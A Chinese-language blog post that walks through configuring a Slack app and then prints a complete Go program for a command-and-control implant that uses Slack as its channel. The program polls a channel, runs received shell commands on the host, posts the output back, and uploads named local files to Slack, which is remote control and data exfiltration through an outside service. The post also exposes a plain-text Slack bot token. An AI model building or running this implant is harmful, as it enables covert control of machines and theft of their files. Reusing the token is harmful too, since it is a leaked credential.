Slack Golang C2

警告
本文最后更新于 2020-10-03,文中内容可能已过时。

最近在学golang,恰好看到demon分析的golang slack c2,便想着自己也来写一写。

# 配置slack

注册账号什么的就不说了。访问 https://api.slack.com/ 点击 Start Building

image.png

创建一个app

image.png

左侧OAuth & Permissions -> Scopes 配置token权限,暂时先配置两个,之后用哪个再加。

image.png

然后往上翻点Install App to Workspace

image.png

点allow,然后会自动跳转到token界面,记住这个token。

image.png

1
xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S

创建一个channel

image.png

记住你的channel链接https://app.slack.com/client/T01C58MD8L9/C01BS6GEUJH中的C01BS6GEUJH

image.png

通过 /invite @myslackbot把bot加到频道里。

然后在https://api.slack.com/methods是操作bot的所有api,先用https://api.slack.com/methods/conversations.history/test测试下获取聊天记录

配置好token和channel ID

image.png

点test之后获取到聊天记录

image.png

image.png

简单的流程知道了,接下来通过golang来操作api,以及编写我们的C2。

# golang编写

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
package main

import (
	"bytes"
	"fmt"
	"github.com/tidwall/gjson"
	"io"
	"io/ioutil"
	"log"
	"mime/multipart"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
	"strconv"
	"strings"
	"time"
)

const (
	HistoryApi  = "https://slack.com/api/conversations.history"
	PostMessage = "https://slack.com/api/chat.postMessage"
	FileUpload  = "https://slack.com/api/files.upload"
	Token       = "xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S"
	Channel     = "C01BS6GEUJH"
)

var Timer = 10

func sleep() {
	fmt.Sprintf("sleep %s",Timer)
	time.Sleep(time.Duration(Timer) * time.Second)
}
func main() {
	for true {
		result := ApiGet(HistoryApi, "messages.0.text")
		if strings.HasPrefix(result.Str, "shell") {
			cmdRes := ExecCommand(strings.Split(result.Str, " ")[1:])
			ApiPost(cmdRes, PostMessage)
		} else if strings.HasPrefix(result.Str, "exit") {
			os.Exit(0)
		} else if strings.HasPrefix(result.Str, "sleep") {
			s := strings.Split(result.Str, " ")[1]
			atoi, err := strconv.Atoi(s)
			if err != nil {
				ApiPost(err.Error(), PostMessage)
			}
			Timer = atoi
		} else if strings.HasPrefix(result.Str, "download") {
			filename := strings.Split(result.Str, " ")[1]
			ApiUpload(filename)
		}	else {
			fmt.Println("no command")
		}
		sleep()
	}
}

func ExecCommand(command []string) (out string) {
	fmt.Println(command)
	cmd := exec.Command(command[0], command[1:]...)
	o, err := cmd.CombinedOutput()

	if err != nil {
		out = fmt.Sprintf("shell run error: \n%s\n", err)
	} else {
		out = fmt.Sprintf("combined out:\n%s\n", string(o))
	}
	return
}

func ApiGet(apiUrl string, rule string) gjson.Result {
	r, err := http.NewRequest("GET", apiUrl, nil)
	query := r.URL.Query()
	query.Add("token", Token)
	query.Add("channel", Channel)
	query.Add("pretty", "1")
	query.Add("limit", "1")
	r.URL.RawQuery = query.Encode()
	response, err := http.DefaultClient.Do(r)
	defer response.Body.Close()
	if err != nil {
		return gjson.Result{}
	}
	bytes, _ := ioutil.ReadAll(response.Body)
	//fmt.Println(string(bytes))
	return gjson.GetBytes(bytes, rule)
}
func ApiPost(text string, apiUrl string) {
	var r http.Request
	r.ParseForm()
	r.Form.Add("token", Token)
	r.Form.Add("channel", Channel)
	r.Form.Add("pretty", "1")
	r.Form.Add("text", text)
	r.Form.Add("mrkdwn", "false")
	body := strings.NewReader(r.Form.Encode())
	response, err := http.Post(apiUrl, "application/x-www-form-urlencoded", body)
	if err != nil {
		return
	}
	bytes, _ := ioutil.ReadAll(response.Body)
	ok := gjson.GetBytes(bytes, "ok")
	fmt.Println(ok)
}
func ApiUpload(filename string) {
	//fmt.Println(filename)
	// 创建表单文件
	// CreateFormFile 用来创建表单,第一个参数是字段名,第二个参数是文件名
	buf := new(bytes.Buffer)
	writer := multipart.NewWriter(buf)
	writer.WriteField("token", Token)
	writer.WriteField("pretty", "1")
	writer.WriteField("channels", Channel)
	//writer.WriteField("filetype", "text")
	formFile, err := writer.CreateFormFile("file", filepath.Base(filename))
	if err != nil {
		log.Fatalf("Create form file failed: %s\n", err)
	}

	// 从文件读取数据,写入表单
	srcFile, err := os.Open(filename)
	if err != nil {
		log.Fatalf("%Open source file failed: s\n", err)
	}
	defer srcFile.Close()
	_, err = io.Copy(formFile, srcFile)
	if err != nil {
		log.Fatalf("Write to form file falied: %s\n", err)
	}

	// 发送表单
	contentType := writer.FormDataContentType()
	writer.Close() // 发送之前必须调用Close()以写入结尾行
	_, err = http.Post(FileUpload, contentType, buf)
	if err != nil {
		log.Fatalf("Post failed: %s\n", err)
	}
	//all, err := ioutil.ReadAll(resp.Body)
	//fmt.Println(string(all))
}

看下效果

自己偷偷摸摸实现了很多功能,就不放了,通过slack的API可以做很多事情。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。